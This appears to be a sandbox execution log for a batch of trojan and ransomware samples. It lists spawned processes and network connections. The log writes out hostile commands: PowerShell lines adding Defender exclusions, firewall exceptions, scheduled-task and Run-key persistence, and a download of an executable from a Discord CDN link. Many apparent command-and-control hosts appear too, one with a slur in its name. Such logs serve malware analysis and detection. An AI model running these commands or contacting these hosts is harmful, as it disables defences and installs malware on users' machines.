C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe
HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe
HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exe
HEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe
HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe
HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exe
HEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exe
HEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe
HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe
HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exe
Trojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2864 -ip 2864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 224
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
C:\Users\Admin\AppData\Local\Temp\MServices.exe
"C:\Users\Admin\AppData\Local\Temp\MServices.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3664 -ip 3664
C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe
"C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00462\ERROR REPORT.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 904
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\A853.bat C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Users\Admin\AppData\Local\Temp4qsldidhv1r.exe
"C:\Users\Admin\AppData\Local\Temp4qsldidhv1r.exe"
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\chromet.exe
"C:\Windows\chromet.exe"
C:\ProgramData\DLL32.exe
"C:\ProgramData\DLL32.exe"
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4776 -ip 4776
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe" "HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe" ENABLE
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 1996
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe
"C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe"
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe
Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exe
Trojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exe
C:\Windows\SysWOW64\cmd.exe
cmd /Q /C move /Y Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe C:\Users\Admin\AppData\Roaming\csrss.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/872884812841648218/1622305117.exe" "1622305117.exe" "" "" "" "" "" ""
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Crypren.aidd-f2fed74902730102b3666009d639d2cd8211d13445c13658896fd92000a9612e.exe
Trojan-Ransom.Win32.Crypren.aidd-f2fed74902730102b3666009d639d2cd8211d13445c13658896fd92000a9612e.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe
Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe
Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe
C:\Windows\SysWOW64\cmd.exe
cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
C:\Users\Admin\AppData\Local\Temp\wujek.exe
"C:\Users\Admin\AppData\Local\Temp\wujek.exe"
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe
Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe
C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Mystic Entertainment" /f
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe
Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe
Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe
Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe
Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe
C:\Windows\SysWOW64\cmd.exe
cmd /C "attrib +S +H C:\Users\Admin\AppData\Roaming\csrss.exe"
C:\Windows\SYSTEM32\netsh.exe
netsh firewall add allowedprogram "C:\Windows\chromet.exe" "chromet.exe" ENABLE
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-0155894f2ad1ef4217f3281c96169df6148ac32c7bf2aa35a320d8806a715e79.exe
Win.Ransomware.Azvo-9979243-0-0155894f2ad1ef4217f3281c96169df6148ac32c7bf2aa35a320d8806a715e79.exe
C:\Users\Admin\AppData\Local\Temp\magek.exe
"C:\Users\Admin\AppData\Local\Temp\magek.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +S +H C:\Users\Admin\AppData\Roaming\csrss.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-107cfb10b85f27081475968b9c655f70d678283df2029cd3d510d2ac4ab1abb4.exe
Win.Ransomware.Azvo-9979243-0-107cfb10b85f27081475968b9c655f70d678283df2029cd3d510d2ac4ab1abb4.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell -executionpolicy bypass -NonInteractive -windowstyle Hidden -file C:\Users\Admin\AppData\Local\Temp\tmpD433.tmp.ps1
C:\Users\Admin\AppData\Local\Temp\magek.exe
"C:\Users\Admin\AppData\Local\Temp\magek.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe
Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-15e7a36d54970419f5e9629a3c3607a87c7e0424ceaadf37e493c4c5a2c1ab7b.exe
Win.Ransomware.Azvo-9979243-0-15e7a36d54970419f5e9629a3c3607a87c7e0424ceaadf37e493c4c5a2c1ab7b.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe
"C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-19d655c11e2dd8e33ee0b22a199121605b5eeba1e4bd3faadd3fe2498a9273a1.exe
Win.Ransomware.Azvo-9979243-0-19d655c11e2dd8e33ee0b22a199121605b5eeba1e4bd3faadd3fe2498a9273a1.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-313f5fd480c090a7c82f7eddf8c0d1e8b9fd0bf7ccf91c1d68e713bfc99bcef8.exe
Win.Ransomware.Azvo-9979243-0-313f5fd480c090a7c82f7eddf8c0d1e8b9fd0bf7ccf91c1d68e713bfc99bcef8.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-489187c02dc221272fe21e1b98fa0829fd0fb5e34e485581d861583ec812db26.exe
Win.Ransomware.Azvo-9979243-0-489187c02dc221272fe21e1b98fa0829fd0fb5e34e485581d861583ec812db26.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exe
Win.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-5217efafa021c6db6953f47edf76847d13e16e025201ec1b121eb9a44f794df9.exe
Win.Ransomware.Azvo-9979243-0-5217efafa021c6db6953f47edf76847d13e16e025201ec1b121eb9a44f794df9.exe
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-704fe6e056b3eb3d456cc42358931e46a6200f271c2ac000983fd4c5c3c5b448.exe
Win.Ransomware.Azvo-9979243-0-704fe6e056b3eb3d456cc42358931e46a6200f271c2ac000983fd4c5c3c5b448.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-81344710637c19e5d348418999f93546e11f45ee16831b1b5cc6e2d3812c4968.exe
Win.Ransomware.Azvo-9979243-0-81344710637c19e5d348418999f93546e11f45ee16831b1b5cc6e2d3812c4968.exe
C:\Windows\SysWOW64\cmd.exe
"cmd"
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe
Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38.exe
Win.Ransomware.Azvo-9979243-0-e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-ece1138f7974f8945510c7802a89e9d30122621bd018d23d508dd25aa05457c2.exe
Win.Ransomware.Azvo-9979243-0-ece1138f7974f8945510c7802a89e9d30122621bd018d23d508dd25aa05457c2.exe
C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /f /tn MicrosoftOneDriveStandalone /tr "C:\Users\Admin\AppData\Roaming\windows\SecurityCryptography.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 7 /f /tn SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\windows\microsoft.foundation.diagnostics.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v COM_LOADER /d "\\.\F:\Program Files\PDF_Reader\bin\COM7.EXE"
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
C:\Users\Admin\Desktop\00462\Win.Trojan.Crypted-29-0c54f7f1fdc78f8691e4984b636889f8d39faf868ac54998f8af8534404ce537.exe
Win.Trojan.Crypted-29-0c54f7f1fdc78f8691e4984b636889f8d39faf868ac54998f8af8534404ce537.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5176 -ip 5176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 228
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe
"{path}"
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe
"{path}"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1B11.tmp.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM "Hetman Partition Recovery.exe"
C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\install\active.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM "SpotifyConverter.exe"
C:\Users\Admin\AppData\Roaming\install\name.exe
"C:\Users\Admin\AppData\Roaming\install\name.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install\tactive.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Program Files (x86)\TunesKit Music Converter\SpotifyConverter.exe
"C:\Program Files (x86)\TunesKit Music Converter\SpotifyConverter.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FUyWXwXWrAlz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp44EF.tmp"
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe
"C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5708 -ip 5708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 1792
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\siude.exe
"C:\Users\Admin\AppData\Local\Temp\siude.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.108.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.my-ip.io | udp |
| DE | 23.88.33.229:443 | api.my-ip.io | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | pcfixmy-download-96.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | payments-online.xyz | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| N/A | 10.10.0.135:4444 | tcp | |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| DE | 23.88.33.229:80 | api.my-ip.io | tcp |
| DE | 23.88.33.229:443 | api.my-ip.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 229.33.88.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | stats.pro-sw.ru | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | mytestdns123.mooo.com | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| KR | 112.175.88.208:11120 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | 74.107.128.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | testdns.ydns.eu | udp |
| NL | 81.19.134.39:287 | testdns.ydns.eu | tcp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| N/A | 192.168.0.100:5552 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 135.148.139.222:33569 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | www.ibayme.eb2a.com | udp |
| US | 199.59.243.226:80 | www.ibayme.eb2a.com | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
